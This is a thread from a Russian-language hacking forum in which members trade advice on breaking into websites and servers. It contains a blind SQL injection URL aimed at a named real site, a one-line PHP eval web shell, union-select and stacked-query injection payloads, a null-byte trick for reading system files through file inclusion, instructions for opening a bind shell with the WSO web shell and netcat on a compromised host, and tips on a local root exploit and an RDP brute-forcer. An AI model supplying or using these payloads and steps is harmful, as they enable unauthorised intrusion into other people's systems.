Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Ты перебор как будешь организовывать? Или значения полей тоже по словарю? Тогда и такой способ пойдёт

    Статью прочти, которую я дал в том посте
     
    1 person likes this.
  2. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Ок,спасибо,буду разбираться.

    http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*
    А какой смысл этого запроса,если все равно экран пустой?
    Ответь плз.
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    А какой он должен быть, если скрипт вообще ничего не выводит?

    Это blind. Пустой экран - TRUE , more than 1 row - FALSE

    Статью прочти, которую я дал в том посте
     
  4. Shadrin

    Shadrin Elder - Старейшина

    Joined:
    20 Aug 2008
    Messages:
    263
    Likes Received:
    109
    Reputations:
    18
    Посоветуйте шелл который можно через pma залить,весом до 5кб и работающий magic_quotes_gpc On
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    <?php eval(stripslashes($_REQUEST[ev])); ?>
     
    1 person likes this.
  6. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    есть скуль инъекция, смогу ли я через нее выполнить запрос update ? и подскажите пример каким образом..
     
  7. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    в mysql - нет, если конечно скуля не в запросе "update".

    а в mssql теоретически можно так script.php?id=4;update.....
     
    2 people like this.
  8. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    MSSQL, PostgreSql, Oracle - любой ql-запрос, отделив его ";" от основного
     
  9. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    понял спасибо, еще такая проблемка, нашел пхп инъекцию, в lang= открываются пхп файлы, ибо там автоматом уже прописывается .php т.е ошибка выходит типа: Warning: main(lang/../../.php) , как мне обойти разрешение это? и посмотреть passwd и еще чтото. ставлю в конец %00 итог: Warning: main(lang/../../\0.php):
     
    1 person likes this.
  10. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    https://forum.antichat.ru/thread98525.html
    Если того что тема прикреплена уже мало, мб начать красить названия тем в цвета радуги и что бы их названия как баннеры на половину браузера вылезали?
     
    1 person likes this.
  11. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    ?поле1=%'+and+поле2=-false+union+select+количество полей/*
     
  12. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    L I G A
    скобку забыл

    ') union select lalala /*
     
    2 people like this.
  13. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Скажите в чём причина,никак не компилируются Файлы не серве с вебшелом c99madshell!?
    Gcc есть
    uname -a:
    Software: Apache/2.2.3 (Debian) DAV/2 SVN/1.4.2 PHP/5.2.6-3 with Suhosin-Patch

    uname -a: Linux yesclub 2.6.18-6-686 #1 SMP Sun Feb 10 22:11:31 UTC 2008 i686

    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    Safe-mode: OFF (not secure)
    И подскажите рабочий эксплойт под это систему.
    И ещё при конекте через Puty на бинд порт все строки сдвигаются,комынды не выполняются,всегда пишет comand not found,что бы не писал.
     
    #9613 p.r0phe.t, 30 Oct 2009
    Last edited: 30 Oct 2009
  14. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    Возможно, этот прокатит - vmsplice Local Root Exploit
     
  15. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Его то я и пытаюсь собрать
    gcc -o expl expl.c
    ничего не выводит,вообще ничего не компилит... =(
     
  16. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    2p.r0phe.t
    Залей шелл WSO.
    Там есть ф-я бинд порт.
    У себя поставь NetCat, и вбей команду(у себя) nc -l -p 31336
    В шелле вбивай свой ip и жми bind (выбирай перловый бинд).
    Смотри в свойю cmd, увидишь консоль сервака.
    И там уже компели.
     
  17. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    p.r0phe.t
    а ты де нить попробуй собрать експлоит а потом загрузить
     
  18. Adekvatnyj

    Adekvatnyj Member

    Joined:
    28 Oct 2009
    Messages:
    18
    Likes Received:
    25
    Reputations:
    -3
    Подскажите брутер для дедиков, рабочий.
     
    1 person likes this.
  19. Forser

    Forser Member

    Joined:
    21 Sep 2009
    Messages:
    32
    Likes Received:
    6
    Reputations:
    1
    RPD Brute - качай
     
    1 person likes this.
  20. p.r0phe.t

    p.r0phe.t Member

    Joined:
    22 Aug 2009
    Messages:
    94
    Likes Received:
    8
    Reputations:
    0
    Спс,гляну.

    Нету дебиана под рукой,ставить ломы =)
    А чё по вебу нельзя gcc юзать?
     
Thread Status:
Not open for further replies.